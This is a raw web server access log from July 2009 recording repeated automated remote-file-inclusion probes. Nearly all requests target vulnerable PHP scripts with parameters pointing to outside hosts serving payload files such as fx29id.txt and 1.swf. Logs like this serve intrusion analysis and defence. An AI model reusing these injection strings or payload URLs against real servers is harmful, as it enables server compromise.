87.118.116.72 - - [03/Jul/2009:19:53:53 +0000] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.akiraselfservice.com/fotos/idev.txt%0D?? HTTP/1.1" 404 333
87.118.116.72 - - [03/Jul/2009:19:53:53 +0000] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.akiraselfservice.com/fotos/idev.txt%0D?? HTTP/1.1" 404 333
87.118.116.72 - - [03/Jul/2009:19:53:53 +0000] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.akiraselfservice.com/fotos/idev.txt%0D?? HTTP/1.1" 404 328
122.153.218.5 - - [03/Jul/2009:19:54:12 +0000] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.pinoy.ae/media/fx29id.txt? HTTP/1.1" 404 287
122.153.218.5 - - [03/Jul/2009:19:54:12 +0000] "GET /logs/access_log%20%20/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.pinoy.ae/media/fx29id.txt? HTTP/1.1" 404 305
122.153.218.5 - - [03/Jul/2009:19:54:12 +0000] "GET /logs/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.pinoy.ae/media/fx29id.txt? HTTP/1.1" 404 292
122.153.218.5 - - [03/Jul/2009:19:54:30 +0000] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.pinoy.ae/media/fx29id.txt? HTTP/1.1" 404 287
122.153.218.5 - - [03/Jul/2009:19:54:30 +0000] "GET /logs/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.pinoy.ae/media/fx29id.txt? HTTP/1.1" 404 292
122.153.218.5 - - [03/Jul/2009:19:54:30 +0000] "GET /logs/access_log/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.pinoy.ae/media/fx29id.txt? HTTP/1.1" 404 303
207.58.155.223 - - [03/Jul/2009:19:54:47 +0000] "GET /logs/access_log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jitkavirag.com/wp-content/plugins/dm-albums/template/fx29id.txt?? HTTP/1.1" 404 346
87.118.116.72 - - [03/Jul/2009:19:55:56 +0000] "GET /logs/access_log%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.akiraselfservice.com/fotos/idev.txt%0D?? HTTP/1.1" 404 345
87.118.116.72 - - [03/Jul/2009:19:55:59 +0000] "GET /logs/access_log%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.akiraselfservice.com/fotos/idev.txt%0D?? HTTP/1.1" 404 345
122.153.218.5 - - [03/Jul/2009:20:00:09 +0000] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.pinoy.ae/media/fx29id.txt? HTTP/1.1" 404 287
122.153.218.5 - - [03/Jul/2009:20:00:11 +0000] "GET /logs/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.pinoy.ae/media/fx29id.txt? HTTP/1.1" 404 292
122.153.218.5 - - [03/Jul/2009:20:00:11 +0000] "GET /logs/access_log/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.pinoy.ae/media/fx29id.txt? HTTP/1.1" 404 303
122.153.218.5 - - [03/Jul/2009:20:03:12 +0000] "GET /logs/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.pinoy.ae/media/fx29id.txt? HTTP/1.1" 404 292
122.153.218.5 - - [03/Jul/2009:20:03:12 +0000] "GET /logs/access_log/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.pinoy.ae/media/fx29id.txt? HTTP/1.1" 404 303
122.153.218.5 - - [03/Jul/2009:20:03:15 +0000] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.pinoy.ae/media/fx29id.txt? HTTP/1.1" 404 287
122.153.218.5 - - [03/Jul/2009:20:06:58 +0000] "GET /logs/access_log%20%20/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.pinoy.ae/media/fx29id.txt? HTTP/1.1" 404 305
216.117.128.143 - - [03/Jul/2009:20:12:57 +0000] "GET /vwar/convert/mvcw.php?step=1&vwar_root=http://www.kusa-knu.com/skin/latest/random/lolid1.txt? HTTP/1.1" 404 298
216.117.128.143 - - [03/Jul/2009:20:12:58 +0000] "GET /logs/access_log/vwar/convert/mvcw.php?step=1&vwar_root=http://www.kusa-knu.com/skin/latest/random/lolid1.txt? HTTP/1.1" 404 314
216.117.128.143 - - [03/Jul/2009:20:12:58 +0000] "GET /logs/vwar/convert/mvcw.php?step=1&vwar_root=http://www.kusa-knu.com/skin/latest/random/lolid1.txt? HTTP/1.1" 404 303
190.144.44.36 - - [03/Jul/2009:20:20:03 +0000] "GET /logs/access_log%20%20//modules/My_eGallery/public/displayCategory.php?basepath=http://www.freewebtown.com/fucku6/fx29id1.txt?? HTTP/1.1" 404 342
190.144.44.36 - - [03/Jul/2009:20:20:03 +0000] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.freewebtown.com/fucku6/fx29id1.txt?? HTTP/1.1" 404 324
190.144.44.36 - - [03/Jul/2009:20:20:03 +0000] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.freewebtown.com/fucku6/fx29id1.txt?? HTTP/1.1" 404 329
209.51.133.202 - - [03/Jul/2009:20:20:14 +0000] "GET /?_com_virtuemart[DOCUMENT_ROOT]=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 200 125
209.51.133.202 - - [03/Jul/2009:20:20:14 +0000] "GET /logs/?_com_virtuemart[DOCUMENT_ROOT]=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 200 1879
209.51.133.202 - - [03/Jul/2009:20:20:14 +0000] "GET /logs/access_log/?_com_virtuemart[DOCUMENT_ROOT]=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 293
81.169.130.252 - - [03/Jul/2009:20:20:53 +0000] "GET /?_com_virtuemart[DOCUMENT_ROOT]=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 200 125
81.169.130.252 - - [03/Jul/2009:20:20:53 +0000] "GET /logs/?_com_virtuemart[DOCUMENT_ROOT]=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 200 1879
81.169.130.252 - - [03/Jul/2009:20:20:55 +0000] "GET /logs/access_log/?_com_virtuemart[DOCUMENT_ROOT]=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 293
209.51.133.202 - - [03/Jul/2009:20:21:46 +0000] "GET /logs/access_log%20%20/?_com_virtuemart[DOCUMENT_ROOT]=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 295
87.118.116.72 - - [03/Jul/2009:20:22:13 +0000] "GET /?_com_virtuemart[DOCUMENT_ROOT]=http://www.akiraselfservice.com/fotos/idev.txt%0D?? HTTP/1.1" 200 125
87.118.116.72 - - [03/Jul/2009:20:22:13 +0000] "GET /logs/access_log/?_com_virtuemart[DOCUMENT_ROOT]=http://www.akiraselfservice.com/fotos/idev.txt%0D?? HTTP/1.1" 404 293
87.118.116.72 - - [03/Jul/2009:20:22:13 +0000] "GET /logs/?_com_virtuemart[DOCUMENT_ROOT]=http://www.akiraselfservice.com/fotos/idev.txt%0D?? HTTP/1.1" 200 1879
87.118.116.72 - - [03/Jul/2009:20:22:18 +0000] "GET /logs/access_log/?_com_virtuemart[DOCUMENT_ROOT]=http://www.akiraselfservice.com/fotos/idev.txt%0D?? HTTP/1.1" 404 293
87.118.116.72 - - [03/Jul/2009:20:22:18 +0000] "GET /?_com_virtuemart[DOCUMENT_ROOT]=http://www.akiraselfservice.com/fotos/idev.txt%0D?? HTTP/1.1" 200 125
87.118.116.72 - - [03/Jul/2009:20:22:18 +0000] "GET /logs/?_com_virtuemart[DOCUMENT_ROOT]=http://www.akiraselfservice.com/fotos/idev.txt%0D?? HTTP/1.1" 200 1879
212.21.132.10 - - [03/Jul/2009:20:24:48 +0000] "GET /logs/access_log/?_com_virtuemart[DOCUMENT_ROOT]=http://fd.axl-jp.net//assets/export/id1.txt? HTTP/1.1" 404 293
212.21.132.10 - - [03/Jul/2009:20:24:48 +0000] "GET /?_com_virtuemart[DOCUMENT_ROOT]=http://fd.axl-jp.net//assets/export/id1.txt? HTTP/1.1" 200 125
212.21.132.10 - - [03/Jul/2009:20:24:48 +0000] "GET /logs/?_com_virtuemart[DOCUMENT_ROOT]=http://fd.axl-jp.net//assets/export/id1.txt? HTTP/1.1" 200 1879
87.118.116.72 - - [03/Jul/2009:20:26:08 +0000] "GET /logs/access_log%20/?_com_virtuemart[DOCUMENT_ROOT]=http://www.akiraselfservice.com/fotos/idev.txt%0D?? HTTP/1.1" 404 294
87.118.116.72 - - [03/Jul/2009:20:26:28 +0000] "GET /logs/access_log%20/?_com_virtuemart[DOCUMENT_ROOT]=http://www.akiraselfservice.com/fotos/idev.txt%0D?? HTTP/1.1" 404 294
216.117.128.143 - - [03/Jul/2009:20:38:47 +0000] "GET /logs/vwar/convert/mvcw.php?step=1&vwar_root=http://www.kusa-knu.com/skin/latest/random/lolid1.txt? HTTP/1.1" 404 303
216.117.128.143 - - [03/Jul/2009:20:38:47 +0000] "GET /logs/access_log/vwar/convert/mvcw.php?step=1&vwar_root=http://www.kusa-knu.com/skin/latest/random/lolid1.txt? HTTP/1.1" 404 314
216.117.128.143 - - [03/Jul/2009:20:38:47 +0000] "GET /vwar/convert/mvcw.php?step=1&vwar_root=http://www.kusa-knu.com/skin/latest/random/lolid1.txt? HTTP/1.1" 404 298
212.21.132.10 - - [03/Jul/2009:20:39:03 +0000] "GET /logs/access_log%20%20/?_com_virtuemart[DOCUMENT_ROOT]=http://fd.axl-jp.net//assets/export/id1.txt? HTTP/1.1" 404 295
216.117.128.143 - - [03/Jul/2009:20:41:34 +0000] "GET /vwar/convert/mvcw.php?step=1&vwar_root=http://www.kusa-knu.com/skin/latest/random/lolid1.txt? HTTP/1.1" 404 298
216.117.128.143 - - [03/Jul/2009:20:41:35 +0000] "GET /logs/vwar/convert/mvcw.php?step=1&vwar_root=http://www.kusa-knu.com/skin/latest/random/lolid1.txt? HTTP/1.1" 404 303
216.117.128.143 - - [03/Jul/2009:20:41:39 +0000] "GET /logs/access_log%20%20/vwar/convert/mvcw.php?step=1&vwar_root=http://www.kusa-knu.com/skin/latest/random/lolid1.txt? HTTP/1.1" 404 316
114.200.199.144 - - [03/Jul/2009:20:44:33 +0000] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 292
114.200.199.144 - - [03/Jul/2009:20:44:33 +0000] "GET /logs/access_log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 303
114.200.199.144 - - [03/Jul/2009:20:44:33 +0000] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 287
114.200.199.144 - - [03/Jul/2009:20:48:25 +0000] "GET /logs/access_log%20%20//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 305
72.14.199.85 - - [03/Jul/2009:20:50:00 +0000] "GET /feeds/posts/default HTTP/1.1" 404 296
93.187.232.20 - - [03/Jul/2009:21:00:58 +0000] "GET //include/admin.lib.inc.php?site_path=http://www.geocities.com/angie.cayo/spread.txt??? HTTP/1.1" 404 303
93.187.232.20 - - [03/Jul/2009:21:00:58 +0000] "GET /logs//include/admin.lib.inc.php?site_path=http://www.geocities.com/angie.cayo/spread.txt??? HTTP/1.1" 404 308
93.187.232.20 - - [03/Jul/2009:21:00:58 +0000] "GET /logs/access_log%20%20//include/admin.lib.inc.php?site_path=http://www.geocities.com/angie.cayo/spread.txt??? HTTP/1.1" 404 321
213.236.166.83 - - [03/Jul/2009:21:08:21 +0000] "GET /http://www.die-grenzreiter.com/content/download/idx? HTTP/1.1" 404 328
123.143.98.5 - - [03/Jul/2009:21:09:36 +0000] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.neoeffect.co.kr/board//include/fid.txt?? HTTP/1.1" 404 328
123.143.98.5 - - [03/Jul/2009:21:09:36 +0000] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.neoeffect.co.kr/board//include/fid.txt?? HTTP/1.1" 404 333
123.143.98.5 - - [03/Jul/2009:21:09:36 +0000] "GET /logs/access_log/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.neoeffect.co.kr/board//include/fid.txt?? HTTP/1.1" 404 344
123.143.98.5 - - [03/Jul/2009:21:09:40 +0000] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.neoeffect.co.kr/board//include/fid.txt?? HTTP/1.1" 404 333
123.143.98.5 - - [03/Jul/2009:21:09:40 +0000] "GET /logs/access_log/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.neoeffect.co.kr/board//include/fid.txt?? HTTP/1.1" 404 344
123.143.98.5 - - [03/Jul/2009:21:09:40 +0000] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.neoeffect.co.kr/board//include/fid.txt?? HTTP/1.1" 404 328
93.187.232.20 - - [03/Jul/2009:21:09:46 +0000] "GET /logs/access_log//include/admin.lib.inc.php?site_path=http://www.geocities.com/angie.cayo/spread.txt??? HTTP/1.1" 404 319
216.86.146.10 - - [03/Jul/2009:21:09:50 +0000] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 328
216.86.146.10 - - [03/Jul/2009:21:09:51 +0000] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 333
216.86.146.10 - - [03/Jul/2009:21:09:51 +0000] "GET /logs/access_log/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 344
209.51.133.202 - - [03/Jul/2009:21:10:59 +0000] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 328
209.51.133.202 - - [03/Jul/2009:21:10:59 +0000] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 333
209.51.133.202 - - [03/Jul/2009:21:10:59 +0000] "GET /logs/access_log/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 344
216.86.146.10 - - [03/Jul/2009:21:11:24 +0000] "GET /logs/access_log%20%20/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 346
123.143.98.5 - - [03/Jul/2009:21:11:26 +0000] "GET /logs/access_log%20%20/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.neoeffect.co.kr/board//include/fid.txt?? HTTP/1.1" 404 346
123.143.98.5 - - [03/Jul/2009:21:11:28 +0000] "GET /logs/access_log%20%20/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.neoeffect.co.kr/board//include/fid.txt?? HTTP/1.1" 404 346
209.51.133.202 - - [03/Jul/2009:21:11:47 +0000] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 333
209.51.133.202 - - [03/Jul/2009:21:11:47 +0000] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 328
209.51.133.202 - - [03/Jul/2009:21:11:47 +0000] "GET /logs/access_log/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 344
209.51.133.202 - - [03/Jul/2009:21:11:51 +0000] "GET /logs/access_log%20%20/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 346
209.51.133.202 - - [03/Jul/2009:21:12:35 +0000] "GET /logs/access_log%20%20/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 346
81.169.130.252 - - [03/Jul/2009:21:12:55 +0000] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 328
81.169.130.252 - - [03/Jul/2009:21:12:55 +0000] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 333
81.169.130.252 - - [03/Jul/2009:21:12:55 +0000] "GET /logs/access_log/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 344
209.51.133.202 - - [03/Jul/2009:21:13:06 +0000] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 333
209.51.133.202 - - [03/Jul/2009:21:13:06 +0000] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 328
209.51.133.202 - - [03/Jul/2009:21:13:06 +0000] "GET /logs/access_log%20%20/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 346
216.117.128.143 - - [03/Jul/2009:21:15:41 +0000] "GET /logs/access_log/vwar/convert/mvcw.php?step=1&vwar_root=http://www.kusa-knu.com/skin/latest/random/lolid1.txt? HTTP/1.1" 404 314
216.117.128.143 - - [03/Jul/2009:21:15:41 +0000] "GET /logs/vwar/convert/mvcw.php?step=1&vwar_root=http://www.kusa-knu.com/skin/latest/random/lolid1.txt? HTTP/1.1" 404 303
216.117.128.143 - - [03/Jul/2009:21:15:41 +0000] "GET /vwar/convert/mvcw.php?step=1&vwar_root=http://www.kusa-knu.com/skin/latest/random/lolid1.txt? HTTP/1.1" 404 298
209.51.133.202 - - [03/Jul/2009:21:15:53 +0000] "GET /logs/access_log/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 344
216.117.128.143 - - [03/Jul/2009:21:17:48 +0000] "GET /vwar/convert/mvcw.php?step=1&vwar_root=http://www.kusa-knu.com/skin/latest/random/lolid1.txt? HTTP/1.1" 404 298
216.117.128.143 - - [03/Jul/2009:21:17:48 +0000] "GET /logs/vwar/convert/mvcw.php?step=1&vwar_root=http://www.kusa-knu.com/skin/latest/random/lolid1.txt? HTTP/1.1" 404 303
216.117.128.143 - - [03/Jul/2009:21:17:48 +0000] "GET /logs/access_log%20%20/vwar/convert/mvcw.php?step=1&vwar_root=http://www.kusa-knu.com/skin/latest/random/lolid1.txt? HTTP/1.1" 404 316
216.117.128.143 - - [03/Jul/2009:21:18:57 +0000] "GET /vwar/convert/mvcw.php?step=1&vwar_root=http://www.kusa-knu.com/skin/latest/random/lolid1.txt? HTTP/1.1" 404 298
216.117.128.143 - - [03/Jul/2009:21:18:57 +0000] "GET /logs/access_log/vwar/convert/mvcw.php?step=1&vwar_root=http://www.kusa-knu.com/skin/latest/random/lolid1.txt? HTTP/1.1" 404 314
216.117.128.143 - - [03/Jul/2009:21:18:57 +0000] "GET /logs/vwar/convert/mvcw.php?step=1&vwar_root=http://www.kusa-knu.com/skin/latest/random/lolid1.txt? HTTP/1.1" 404 303
81.169.130.252 - - [03/Jul/2009:21:23:53 +0000] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 328
81.169.130.252 - - [03/Jul/2009:21:23:54 +0000] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 333
81.169.130.252 - - [03/Jul/2009:21:23:54 +0000] "GET /logs/access_log/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 344
213.171.225.234 - - [03/Jul/2009:21:32:13 +0000] "GET /logs/access_log//error.php?dir=http://fd.axl-jp.net//assets/export/v6-i.txt??? HTTP/1.1" 404 303
213.171.225.234 - - [03/Jul/2009:21:32:13 +0000] "GET //error.php?dir=http://fd.axl-jp.net//assets/export/v6-i.txt??? HTTP/1.1" 404 287
213.171.225.234 - - [03/Jul/2009:21:32:14 +0000] "GET /logs//error.php?dir=http://fd.axl-jp.net//assets/export/v6-i.txt??? HTTP/1.1" 404 292
72.14.199.85 - - [03/Jul/2009:21:50:05 +0000] "GET /feeds/posts/default HTTP/1.1" 404 296
93.187.232.20 - - [03/Jul/2009:21:59:34 +0000] "GET /logs/access_log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.helpvenice.com/id.txt??? HTTP/1.1" 404 337
93.187.232.20 - - [03/Jul/2009:21:59:34 +0000] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.helpvenice.com/id.txt??? HTTP/1.1" 404 326
217.70.32.2 - - [03/Jul/2009:22:04:00 +0000] "GET /vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.kusa-knu.com/skin/latest/random/lolid1.txt? HTTP/1.1" 404 305
217.70.32.2 - - [03/Jul/2009:22:04:00 +0000] "GET /logs/access_log/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.kusa-knu.com/skin/latest/random/lolid1.txt? HTTP/1.1" 404 321
217.70.32.2 - - [03/Jul/2009:22:04:00 +0000] "GET /logs/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.kusa-knu.com/skin/latest/random/lolid1.txt? HTTP/1.1" 404 310
88.191.37.60 - - [03/Jul/2009:22:04:33 +0000] "GET /logs/access_log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.look22.de/new.txt?? HTTP/1.1" 404 337
88.191.37.60 - - [03/Jul/2009:22:04:33 +0000] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.look22.de/new.txt?? HTTP/1.1" 404 321
88.191.37.60 - - [03/Jul/2009:22:04:33 +0000] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.look22.de/new.txt?? HTTP/1.1" 404 326
87.230.9.68 - - [03/Jul/2009:22:25:45 +0000] "GET /logs/access_log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.look22.de/new.txt?? HTTP/1.1" 404 337
87.230.9.68 - - [03/Jul/2009:22:25:50 +0000] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.look22.de/new.txt?? HTTP/1.1" 404 321
87.230.9.68 - - [03/Jul/2009:22:25:53 +0000] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.look22.de/new.txt?? HTTP/1.1" 404 326
61.109.245.179 - - [03/Jul/2009:22:36:00 +0000] "GET /logs//components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 340
61.109.245.179 - - [03/Jul/2009:22:36:00 +0000] "GET //components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 335
61.109.245.179 - - [03/Jul/2009:22:36:00 +0000] "GET /logs/access_log//components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 351
61.109.245.179 - - [03/Jul/2009:22:40:18 +0000] "GET /logs/access_log%20//components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 352
85.25.147.102 - - [03/Jul/2009:22:40:21 +0000] "GET /logs/access_log///vwar/backup/errors.php?error=http://carrster.com/vnc/fx29id.txt?? HTTP/1.1" 404 317
85.25.147.102 - - [03/Jul/2009:22:40:21 +0000] "GET ///vwar/backup/errors.php?error=http://carrster.com/vnc/fx29id.txt?? HTTP/1.1" 404 301
85.25.147.102 - - [03/Jul/2009:22:40:21 +0000] "GET /logs///vwar/backup/errors.php?error=http://carrster.com/vnc/fx29id.txt?? HTTP/1.1" 404 306
213.236.166.83 - - [03/Jul/2009:22:41:17 +0000] "GET /http://www.die-grenzreiter.com/content/download/idx? HTTP/1.1" 404 328
201.25.222.154 - - [03/Jul/2009:22:44:42 +0000] "GET //include/admin.lib.inc.php?site_path=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 303
85.25.147.102 - - [03/Jul/2009:22:44:52 +0000] "GET /logs/access_log%20%20///vwar/backup/errors.php?error=http://carrster.com/vnc/fx29id.txt?? HTTP/1.1" 404 319
218.38.29.124 - - [03/Jul/2009:22:45:45 +0000] "GET /logs/access_log//components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 351
218.38.29.124 - - [03/Jul/2009:22:45:45 +0000] "GET /logs//components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 340
218.38.29.124 - - [03/Jul/2009:22:45:45 +0000] "GET //components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 335
216.86.146.10 - - [03/Jul/2009:22:45:57 +0000] "GET /logs//bbs//zero_vote/error.php?dir=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 307
216.86.146.10 - - [03/Jul/2009:22:45:57 +0000] "GET //bbs//zero_vote/error.php?dir=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 302
216.86.146.10 - - [03/Jul/2009:22:45:57 +0000] "GET /logs/access_log%20%20//bbs//zero_vote/error.php?dir=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 320
218.38.136.251 - - [03/Jul/2009:22:50:05 +0000] "GET /logs//components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.walji-co.com/includes/id1.txt? HTTP/1.1" 404 340
218.38.136.251 - - [03/Jul/2009:22:50:05 +0000] "GET /logs/access_log//components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.walji-co.com/includes/id1.txt? HTTP/1.1" 404 351
218.38.136.251 - - [03/Jul/2009:22:50:05 +0000] "GET //components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.walji-co.com/includes/id1.txt? HTTP/1.1" 404 335
72.14.199.85 - - [03/Jul/2009:22:50:18 +0000] "GET /feeds/posts/default HTTP/1.1" 404 296
